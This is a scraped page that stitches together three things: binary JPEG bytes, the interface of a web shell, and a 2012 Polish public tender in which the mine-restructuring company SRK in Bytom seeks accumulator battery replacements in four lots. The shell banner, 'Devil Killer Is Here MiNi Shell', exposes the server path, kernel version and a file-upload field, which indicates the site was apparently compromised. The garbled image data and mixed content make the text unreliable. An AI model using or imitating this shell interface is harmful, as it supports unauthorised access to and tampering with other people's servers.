JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120612/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120612/196924-N-2012.html

<p class="kh_header"><b>Bytom: Wymiana baterii akumulatorów w ramach zadań:
Część I.	Wymiana baterii akumulatorów na STR 6/0,5/0,4/0,23 kV zasilającej urządzenia pompowni głębinowej Sosnowiec,
Część II.	Wymiana baterii akumulatorów - rejon Jan Kanty,
Część III.	Wymiana baterii akumulatorów 110 V w rozdzielni 6 kV Wentylatory - rejon Siemianowice.
Część IV.	Dostawa i wymiana baterii akumulatorów - rejon Dębieńsko.</b><br>
<b>Numer ogłoszenia: 196924 - 2012; data zamieszczenia: 12.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Spółka Restrukturyzacji Kopalń S.A. , ul. Strzelców Bytomskich 207, 41-914 Bytom, woj. śląskie, tel. 032 3513300, 3513301, 3513364, faks 032 3513309, -10, 3513369.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.srk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednoosobowa Spółka Skarbu Państwa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana baterii akumulatorów w ramach zadań:
Część I.	Wymiana baterii akumulatorów na STR 6/0,5/0,4/0,23 kV zasilającej urządzenia pompowni głębinowej Sosnowiec,
Część II.	Wymiana baterii akumulatorów - rejon Jan Kanty,
Część III.	Wymiana baterii akumulatorów 110 V w rozdzielni 6 kV Wentylatory - rejon Siemianowice.
Część IV.	Dostawa i wymiana baterii akumulatorów - rejon Dębieńsko..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wymiana baterii akumulatorów w ramach zadań:
Część I.	Wymiana baterii akumulatorów na STR 6/0,5/0,4/0,23 kV zasilającej urządzenia pompowni głębinowej Sosnowiec,
Część II.	Wymiana baterii akumulatorów - rejon Jan Kanty,
Część III.	Wymiana baterii akumulatorów 110 V w rozdzielni 6 kV Wentylatory - rejon Siemianowice.
Część IV.	Dostawa i wymiana baterii akumulatorów - rejon Dębieńsko.
Szczegółowy opis przedmiotu zamówienia oraz jego zakres wraz z uwarunkowaniami techniczno-organizacyjnymi zawiera załącznik nr 2 do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 31.43.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta powinna być zabezpieczona wadium w wysokości: Część I: 500,00
             zł ( słownie: pięćset złotych 00/100  zł) Część II :  1 100,00 zł ( słownie: jeden tysiąc sto złotych 00/100),  Część III :  250,00 zł   ( słownie: dwieście pięćdziesiąt złotych 00/100) Część IV :  900,00 zł ( słownie: dziewięćset złotych  00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien posiadać niezbędna wiedzę i doświadczenie w wykonywaniu usług o charakterze i złożoności porównywalnej z zakresem zamówienia oraz udokumentować realizację w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną usługę w ramach jednej umowy porównywalną z przedmiotem zamówienia o wartości minimum dla Części I :   10 000,00 zł brutto, dla Części II : 20 000,00 zł brutto, Części III :   5 000,00 zł brutto, Części IV :   20 000,00 zł brutto, W przypadku złożenia oferty na więcej niż jedną część zamówienia Wykonawca może także wykazać co najmniej jedną usługę o charakterze i złożoności porównywalnej z zakresem zamówienia o wartości nie mniejszej niż suma wartości wymienionych powyżej dla poszczególnych części zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien dysponować osobami zdolnymi do realizacji zadania objętego zamówieniem o doświadczeniu umożliwiającym wykonanie zadania posiadających nw. kwalifikacje:
Wykonawca powinien dysponować osobami zdolnymi do wykonania zamówienia posiadają­cymi następujące kwalifikacje:
a.Osoby dozoru Wykonawcy nadzorujące prace związane z realizacją zamówienia w zakresie Części I, Części III, Części IV  muszą posiadać kwalifikacje uprawniające do kierowania czynnościami osób wykonujących prace przy eksploatacji urządzeń i instalacji elektroenergetycznych na napięcie do 1 kV w zakresie konserwacji, remontów, montażu i kontrolno-pomiarowym - zgodnie z Rozporządzeniem Ministra Gospodarki Pracy i Polityki Społecznej z dnia 28.04.2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. nr 89 poz. 828, z późn. zm.). Minimalna liczba osób o ww. kwalifikacjach musi wynosić:
przy realizacji Części I - 1 osoba,
przy realizacji Części III - 1 osoba,
przy realizacji Części IV - 1 osoba.
b.Osoby dozoru Wykonawcy nadzorujące prace związane z realizacją zamówienia w zakresie Części II, Części IV muszą posiadać stwierdzone kwalifikacje co najmniej osoby średniego dozoru ruchu elektrycznego pod ziemią, zgodnie z rozporządzenie Ministra Środowiska z dnia 15 grudnia 2011 r. w sprawie kwalifikacji w zakresie górnictwa i ratownictwa górniczego (Dz. U. Nr 275, poz. 1628). Minimalna liczba osób o ww. kwalifikacjach musi wynosić:
przy realizacji Części II - 1 osoba,
przy realizacji Części IV - 1 osoba.
c.Elektromonterzy wykonujący prace związane z realizacją zamówienia w zakresie Części I, Części III, Części IV muszą posiadać zaświadczenia kwalifikacyjne (typu SEP) uprawniające do wykonywania prac przy eksploatacji urządzeń i instalacji elektroenerge­tycznych na napięcie do 1 kV w zakresie konserwacji, remontów, montażu i kontrolno-pomiarowym - wydane zgodnie z Rozporządzeniem Ministra Gospodarki Pracy i Polityki Społecznej z dnia 28.04.2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. nr 89 poz. 828, z późn. zm.). Minimalna liczba osób o ww. kwalifikacjach musi wynosić:

przy realizacji Części I - 2 osoby,
przy realizacji Części III - 2 osoby,
przy realizacji Części IV - 2 osoby.
d.Elektromonterzy wykonujący prace związane z realizacją zamówienia w zakresie części II i/lub części IV muszą posiadać stwierdzone kwalifikacje do zatrudnienia na stanowisku elektromontera sprzętu elektrycznego o napięciu (co najmniej) do 1 kV zgodnie z rozporządzenie Ministra Środowiska z dnia 15 grudnia 2011 r. w sprawie kwalifikacji w zakresie górnictwa i ratownictwa górniczego (Dz. U. Nr 275, poz. 1628). Minimalna liczba osób o ww. kwalifikacjach musi wynosić:
przy realizacji Części II - 2 osoby,
przy realizacji Części IV - 2 osoby.
co należy udokumentować w formie stosownego oświadczenia Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jeżeli Wykonawca polega na zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków obowiązany jest przedłożyć informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej,              w których te podmioty posiadają rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową tych podmiotów, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenia Wykonawcy w trybie art. 44 ustawy Pzp w związku z art. 22 ust.1
ustawy Pzp zgodnie z pkt. 5.1. SIWZ - załączniki nr 2, 2a, 2b, 2c, 2d do druku OFERTA.          
Wykonawca powołujący się przy wykazaniu spełniania warunków udziału                            w postępowaniu w zakresie wiedzy i doświadczenia, potencjału technicznego, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów (załączniki nr 2a, 2b, 2c, 2d), zobowiązany jest uzyskać pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, które należy dołączyć do załączników nr 2a, 2b, 2c, 2d do druku OFERTA. 
2. Oświadczenie Wykonawcy zawarte w załączniku nr 1 do SIWZ - druk OFERTA w zakresie dotyczącym udzielonej gwarancji zamówienia zgodnie                     z opisem zawartym w pkt. III ppkt.1. załącznika nr 2 do SIWZ.
3. Wypełniony złącznik nr 7 do druku Oferta stanowiący wykaz parametrów 
techniczno-użytkowych oferowane przedmiotu zamówienia zgodniez opisem zawartym w pkt. III ppkt.2 załącznika nr 2 do SIWZ..</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, za wyjątkiem ustawowej zmiany obowiązującej stawki podatku od towarów i usług.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.srk.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Spółka Restrukturyzacji Kopalń S.A. 41-914 Bytom, ul. Strzelców Bytomskich 207 p. 112.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.07.2012 godzina 11:00, miejsce: Spółka Restrukturyzacji Kopalń S.A. 41-914 Bytom, ul. Strzelców Bytomskich 207 - II piętro Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wymiana baterii akumulatorów na STR 6/0,5/0,4/0,23 kV zasilającej urządzenia pompowni głębinowej Sosnowiec.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres rzeczowy przedmiotu zamówienia dla Części I obejmuje dostawę i wymianę akumulato­rów oraz przegląd zasilaczy w rozdzielni prądu stałego sekcja A i sekcja B zlokalizowanej w rejonie Sosnowiec, w tym:
1)w zakresie rozdzielni prądu stałego sekcja A:
dostawę 17 szt. nowych akumulatorów typu 12 HI 50 lub równoważnych przeznaczonych do zmontowania baterii akumulatorów o parametrach:
pojemność znamionowa: co najmniej 53 Ah,
napięcie znamionowe: równe 220 VDC
maksymalny prąd ładowania: najwyżej 0,3 C10,
napięcie pracy konserwacyjnej: 2,27 V/ogniwo;
wymiary jednego akumulatora: umożliwiające montaż 17 szt. akumulatorów w szafie na dwóch półkach o wymiarach (szerokość x głębokość x wysokość) 900 x 585 x 350 mm;
dostawę przewodów połączeniowych (mostków) w przypadku zastosowania akumulato­rów równoważnych zamiast akumulatorów typu 12 HI 50;
demontaż starych 17 szt. akumulatorów typu 12 HI 50 wraz z ich utylizacją;
montaż nowych 17 szt. akumulatorów (na miejscu starych - zdemontowanych) w baterię akumulatorów o napięciu znamionowym 220 V,
uruchomienie zainstalowanej baterii akumulatorowej wraz z wykonaniem niezbędnych prób i pomiarów odbiorczych - potwierdzone protokołami, które będą podlegały przekazaniu Zamawiającemu,
wykonanie przeglądu zasilacza typu ZB 220 DC 10 (rok produkcji 2001) zgodnie z DTR - producenta zakończonego sporządzeniem protokołu z przeglądu, który będzie podlegał przekazaniu Zamawiającemu.
2)w zakresie rozdzielni prądu stałego sekcja B:
dostawę 17 szt. nowych akumulatorów typu 12 HI 50 lub równoważnych przeznaczonych do zmontowania baterii akumulatorów o parametrach:
pojemność znamionowa: co najmniej 53 Ah,
napięcie znamionowe: równe 220 VDC
maksymalny prąd ładowania: najwyżej 0,3 C10,
napięcie pracy konserwacyjnej: 2,27 V/ogniwo;
wymiary jednego akumulatora: umożliwiające montaż 17 szt. akumulatorów w szafie na dwóch półkach o wymiarach (szerokość x głębokość x wysokość) 900 x 585 x 350 mm;
dostawę przewodów połączeniowych (mostków) w przypadku zastosowania akumulatorów równoważnych zamiast akumulatorów typu 12 HI 50;
demontaż starych 17 szt. akumulatorów typu 12 HI 50 wraz z ich utylizacją;
montaż nowych 17 szt. akumulatorów (na miejscu starych - zdemontowanych) w baterię akumulatorów o napięciu znamionowym 220 V,
uruchomienie zainstalowanej baterii akumulatorowej wraz z wykonaniem niezbędnych prób i pomiarów odbiorczych - potwierdzone protokołami, które będą podlegały przeka­zaniu Zamawiającemu,
wykonanie przeglądu zasilacza typu ZB 220 DC 10 (rok produkcji 2001) zgodnie z DTR - producenta zakończonego sporządzeniem protokołu z przeglądu, który będzie podlegał przekazaniu Zamawiającemu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.43.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wymiana baterii akumulatorów - rejon Jan Kanty..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres rzeczowy przedmiotu zamówienia dla części II obejmuje:
1)Dostawę na rejon Jan Kanty siłowni prądu stałego typu UPS DC 48/10/R posiadającej obudowę zamkniętą (w formie wolnostojącej szafy) o stopniu ochrony co najmniej IP 54 i o następujących parametrach:
napięcie zasilające: 230 V AC (zasilanie w układzie IT),
napięcie wyjściowe: 48 V DC.
oraz wyposażonej w:
dwie stacjonarne baterie akumulatorów żelowych typu HZY lub równoważne dwie baterie bezobsługowe, każda o pojemności znamionowej Q10N = 60 Ah i złożona z czterech bloków na napięcie 12 V (po 6 ogniw w każdym bloku).
dwa zasilacze typu ZP 48/10 posiadające: moduł kontroli doziemienia (MKD), układ kompensacji temperaturowej napięcia z pomiarem temperatury baterii (UKT), pomiar ciągłości obwodu baterii (COB),
wraz z technologią jej zabudowy, świadectwem jakości i dokumentacją techniczno-ruchową.
Siłownia prądu stałego typu UPS DC 48/10/R powinna umożliwiać zasilanie dwóch niezależnych obwodów: jednego obwodu dla zasilania potrzeb własnych rozdzielni 6 kV - pracującego ciągle oraz drugiego obwodu dla zasilania oświetlenia awaryjnego - załączanego automatycznie w przypadku braku zasilania 230 V AC.
2)Opracowanie projektu technicznego wymiany istniejącej w Rozdzielni 6 kV R-201 baterii akumulatorowej i prostownika na siłownię prądu stałego typu UPS DC 48/10/R (projekt powinien zawierać co najmniej: dobór zasilaczy i baterii poparty niezbędnymi obliczeniami, sposób ich zabudowy i podłączenia przedstawiony na rysunkach i schematach). Ww. projekt musi być zatwierdzony przez KRZG Zakładu CZOK                  w Czeladzi.
3)Transport dostarczonej siłowni typu UPS DC 48/10/R szybem Witold I na poz. 270 m, a następnie do miejsca zabudowy w rozdzielni dołowej 6 kV R-201 na poz. 270 m (droga transportu na dole wynosi ok. 200 m - możliwy transport po torach).
4)Montaż w pomieszczeniu rozdzielni 6 kV R-201 na poz. 270 m dostarczonej siłowni typu UPS DC 48/10/R wraz z jej podłączeniem.
5)Uruchomienie zainstalowanych baterii akumulatorowych i zasilaczy składających się na siłownię UPS DC 48/10/R wraz z wykonaniem niezbędnych prób i pomiarów odbiorczych - potwierdzone protokołami, które będą podlegały przekazaniu Zamawiającemu.
6)Odbiór z rejonu Jan Kanty i utylizację wyeksploatowanych 4 szt. akumulatorów 12 V/ 140 Ah pochodzących z demontażu baterii akumulatorów w rozdzielni 6 kV R-201 poz. 270 m..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.43.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wymiana baterii akumulatorów 110 V w rozdzielni 6 kV Wentylatory - rejon Siemianowice..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres rzeczowy przedmiotu zamówienia dla części III obejmuje:
1)Dostawę jednej stacyjnej baterii akumulatorów kwasowych o parametrach:
pojemność baterii akumulatorów: Q10N = 110 Ah,
ilość ogniw w baterii: n=54 szt.,
napięcie znamionowe baterii akumulatorów: UN = 110 V.
wraz z zaświadczeniem fabrycznym, deklaracją zgodności, odpowiednimi atestami, instrukcją obsługi i dokumentacją techniczno-ruchową.
Dostarczona bateria musi posiadać parametry nie gorsze niż bateria akumulatorów złożona z ogniw typu SP 110 (typ aktualnie zabudowanej baterii) oraz musi być przystosowana do współpracy z istniejącym prostownikiem typu PAC 110/100.
2)Dostawę kompletu stelaży wraz z izolatorami i kuwetą kwasoodporną do ustawienia baterii akumulatorów zapewniających łatwość obsługi baterii oraz określone w przepisach odstępy ruchowe i przejścia.
3)Dostawę mostków połączeniowych, nakrętek i podkładek w ilości niezbędnej do połączenia bloków baterii akumulatorów.
4)Demontaż wyeksploatowanej (podlegającej wymianie) baterii akumulatorów w rozdzielni 6 kV Wentylatory łącznie z jej wytransportowaniem i utylizacją.
5)Montaż w pomieszczeniu akumulatorni rozdzielni 6 kV Wentylatory dostarczonej baterii akumulatorowej 110 V/110 Ah na dostarczonych stelażach wraz z jej podłączeniem.
6)Sprawdzenie i regulację parametrów prostownika PAC 110/100 do współpracy z zainstalo­waną baterią akumulatorów.
7)Uruchomienie zainstalowanej baterii akumulatorowej wraz z wykonaniem niezbędnych prób i pomiarów odbiorczych (pomiary rezystancji, napięć i pojemności) - potwierdzone protokołami, które będą podlegały przekazaniu Zamawiającemu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.43.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa i wymiana baterii akumulatorów - rejon Dębieńsko.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres rzeczowy przedmiotu zamówienia dla części IV obejmuje dostawę i wymianę: 2 szt. baterii akumulatorowych w rozdzielni 6 kV R-691 na poz. 690 m, 1 szt. baterii akumulatorowej w rozdzielni 6 kV szyb V Zachodni, 2 szt. baterii akumulatorowych w rozdzielni 6 kV R-201 na poz. 202 m, 1 szt. baterii akumulatorowej w rozdzielni 6 kV maszyny wyciągowej szybu Jan III, w tym:

1)	w zakresie baterii akumulatorowych w rozdzielni 6 kV R-691 na poz. 690 m:
